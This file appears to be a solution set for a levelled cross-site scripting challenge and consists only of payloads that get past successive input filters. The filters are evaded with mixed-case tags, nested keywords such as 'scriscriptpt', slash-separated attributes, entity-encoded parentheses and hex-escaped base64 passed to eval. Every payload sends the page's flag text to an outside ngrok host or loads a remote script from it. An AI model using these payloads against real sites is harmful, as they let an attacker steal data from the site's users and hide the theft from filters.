# Bypass first three levels
<ScrIPt>fetch('//2938-2-37-167-108.ngrok-free.app?flag='+document.querySelector('.flag').innerText)</ScrIPt>

# Bypass fourth level
<scriscriptpt src="//2938-2-37-167-108.ngrok-free.app/exploit.js"></scriscriptpt>

# Bypass Fifth level
<img src=x oonnerror="eval(atob('\x5a\x6d\x56\x30\x59\x32\x67\x6f\x4a\x32\x68\x30\x64\x48\x42\x7a\x4f\x69\x38\x76\x59\x7a\x42\x69\x4e\x43\x30\x79\x4c\x54\x4d\x33\x4c\x54\x45\x32\x4e\x79\x30\x78\x4d\x44\x67\x75\x62\x6d\x64\x79\x62\x32\x73\x74\x5a\x6e\x4a\x6c\x5a\x53\x35\x68\x63\x48\x41\x2f\x5a\x6d\x78\x68\x5a\x7a\x30\x6e\x49\x43\x73\x67\x5a\x47\x39\x6a\x64\x57\x31\x6c\x62\x6e\x51\x75\x63\x58\x56\x6c\x63\x6e\x6c\x54\x5a\x57\x78\x6c\x59\x33\x52\x76\x63\x69\x67\x6e\x4c\x6d\x5a\x73\x59\x57\x63\x6e\x4b\x53\x35\x70\x62\x6d\x35\x6c\x63\x6c\x52\x6c\x65\x48\x51\x70'))">

# Bypass sixth level
<img/src="x"/oonnerror="eval(atob('\x5a\x6d\x56\x30\x59\x32\x67\x6f\x4a\x32\x68\x30\x64\x48\x42\x7a\x4f\x69\x38\x76\x59\x7a\x42\x69\x4e\x43\x30\x79\x4c\x54\x4d\x33\x4c\x54\x45\x32\x4e\x79\x30\x78\x4d\x44\x67\x75\x62\x6d\x64\x79\x62\x32\x73\x74\x5a\x6e\x4a\x6c\x5a\x53\x35\x68\x63\x48\x41\x2f\x5a\x6d\x78\x68\x5a\x7a\x30\x6e\x49\x43\x73\x67\x5a\x47\x39\x6a\x64\x57\x31\x6c\x62\x6e\x51\x75\x63\x58\x56\x6c\x63\x6e\x6c\x54\x5a\x57\x78\x6c\x59\x33\x52\x76\x63\x69\x67\x6e\x4c\x6d\x5a\x73\x59\x57\x63\x6e\x4b\x53\x35\x70\x62\x6d\x35\x6c\x63\x6c\x52\x6c\x65\x48\x51\x70'))">

# Bypass seventh
<img/src="x"/oonnerror="eval&lpar;atob&lpar;'\x5a\x6d\x56\x30\x59\x32\x67\x6f\x4a\x32\x68\x30\x64\x48\x42\x7a\x4f\x69\x38\x76\x59\x7a\x42\x69\x4e\x43\x30\x79\x4c\x54\x4d\x33\x4c\x54\x45\x32\x4e\x79\x30\x78\x4d\x44\x67\x75\x62\x6d\x64\x79\x62\x32\x73\x74\x5a\x6e\x4a\x6c\x5a\x53\x35\x68\x63\x48\x41\x2f\x5a\x6d\x78\x68\x5a\x7a\x30\x6e\x49\x43\x73\x67\x5a\x47\x39\x6a\x64\x57\x31\x6c\x62\x6e\x51\x75\x63\x58\x56\x6c\x63\x6e\x6c\x54\x5a\x57\x78\x6c\x59\x33\x52\x76\x63\x69\x67\x6e\x4c\x6d\x5a\x73\x59\x57\x63\x6e\x4b\x53\x35\x70\x62\x6d\x35\x6c\x63\x6c\x52\x6c\x65\x48\x51\x70'&rpar;&rpar;">
